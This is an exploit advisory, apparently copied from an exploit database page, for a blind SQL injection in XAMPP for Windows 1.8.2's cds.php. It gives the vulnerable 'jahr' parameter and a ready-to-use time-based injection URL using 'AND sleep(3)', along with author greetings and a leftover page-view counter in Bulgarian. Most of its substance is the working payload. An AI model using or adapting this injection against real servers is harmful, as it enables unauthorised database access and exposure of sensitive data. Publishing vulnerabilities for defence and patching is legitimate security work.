# Exploit Title: XAMPP for Windows 1.8.2 Blind Sql Injection # Date: 2013/10/28 # Exploit Author: Sebastián Magof # Vendor Homepage: apachefriends.org # Software Link: apachefriends.org/en/xampp-windows.html # Version:1.8.2/1.7.7 # Tested on: Windows # Twitter: @smagof #Greetz: Family, Friends && Under guys; #Special Greetz: My Alpha (: #Description:XAMPP is a platform-independent server, free software, which mainly consists of the MySQL database, the Apache web server and interpreters for scripting languages: PHP and Perl. The name comes from the acronym for X, Apache, MySQL, PHP, Perl. #Sql-Injection: An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. #Vulnerable file: cds.php #Parameter: "jahr=" #Exploit: http://127.0.0.1/xampp/cds.php?jahr=1967 AND sleep(3)&interpret=1&titel=555-666-0606 # (\/) # (**) #(")(")Брой прочитания на тази страница: 1122
XAMPP for Windows 1.8.2 – Blind SQL Injection